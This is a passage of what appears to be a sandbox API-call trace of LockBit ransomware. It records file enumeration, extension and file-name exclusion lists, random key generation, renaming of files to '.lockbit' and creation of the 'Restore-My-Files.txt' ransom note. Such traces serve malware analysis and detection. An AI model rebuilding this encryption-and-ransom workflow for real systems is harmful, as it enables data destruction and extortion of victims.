[0162.188] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecc0f000, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xecc0f000, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x788, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00806_.WMF", cAlternateFileName="")) returned 1 [0162.188] lstrcmpiW (lpString1=".", lpString2="NA00806_.WMF") returned -1 [0162.188] lstrcmpiW (lpString1="..", lpString2="NA00806_.WMF") returned -1 [0162.188] PathFindExtensionW (pszPath="NA00806_.WMF") returned=".WMF" [0162.188] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.188] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.189] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.189] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.190] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00806_.WMF") returned 1 [0162.190] lstrcmpiW (lpString1="ntldr", lpString2="NA00806_.WMF") returned 1 [0162.190] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00806_.WMF") returned 1 [0162.190] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00806_.WMF") returned -1 [0162.190] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00806_.WMF") returned -1 [0162.191] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00806_.WMF") returned 1 [0162.191] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00806_.WMF") returned -1 [0162.191] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.191] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF") returned=".WMF" [0162.191] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.191] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.191] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.192] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.192] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF.lockbit") returned 72 [0162.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00806_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.193] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.193] malloc (_Size=0x40068) returned 0x3df0008 [0162.193] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1928) returned 1 [0162.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.195] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.200] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.200] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.200] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.201] free (_Block=0x1fa2ed8) [0162.201] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.201] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.202] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.202] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8fc300, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb8fc300, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0xba4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00807_.WMF", cAlternateFileName="")) returned 1 [0162.202] lstrcmpiW (lpString1=".", lpString2="NA00807_.WMF") returned -1 [0162.202] lstrcmpiW (lpString1="..", lpString2="NA00807_.WMF") returned -1 [0162.202] PathFindExtensionW (pszPath="NA00807_.WMF") returned=".WMF" [0162.202] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.202] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.203] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.203] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.204] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00807_.WMF") returned 1 [0162.204] lstrcmpiW (lpString1="ntldr", lpString2="NA00807_.WMF") returned 1 [0162.204] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00807_.WMF") returned 1 [0162.204] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00807_.WMF") returned -1 [0162.204] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00807_.WMF") returned -1 [0162.204] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00807_.WMF") returned 1 [0162.204] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00807_.WMF") returned -1 [0162.204] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.204] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF") returned=".WMF" [0162.205] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.205] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.205] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.206] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.206] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF.lockbit") returned 72 [0162.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00807_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.207] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.207] malloc (_Size=0x40068) returned 0x3f70048 [0162.207] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2980) returned 1 [0162.207] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.208] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.208] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.209] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.214] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.214] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.215] free (_Block=0x1fa2ed8) [0162.215] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.216] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.216] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bce0800, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7bce0800, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00808_.WMF", cAlternateFileName="")) returned 1 [0162.216] lstrcmpiW (lpString1=".", lpString2="NA00808_.WMF") returned -1 [0162.216] lstrcmpiW (lpString1="..", lpString2="NA00808_.WMF") returned -1 [0162.216] PathFindExtensionW (pszPath="NA00808_.WMF") returned=".WMF" [0162.216] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.216] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.217] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.217] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.218] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.219] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.219] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00808_.WMF") returned 1 [0162.219] lstrcmpiW (lpString1="ntldr", lpString2="NA00808_.WMF") returned 1 [0162.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00808_.WMF") returned 1 [0162.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00808_.WMF") returned -1 [0162.219] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00808_.WMF") returned -1 [0162.219] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00808_.WMF") returned 1 [0162.219] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00808_.WMF") returned -1 [0162.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF") returned=".WMF" [0162.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.219] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.219] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.219] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 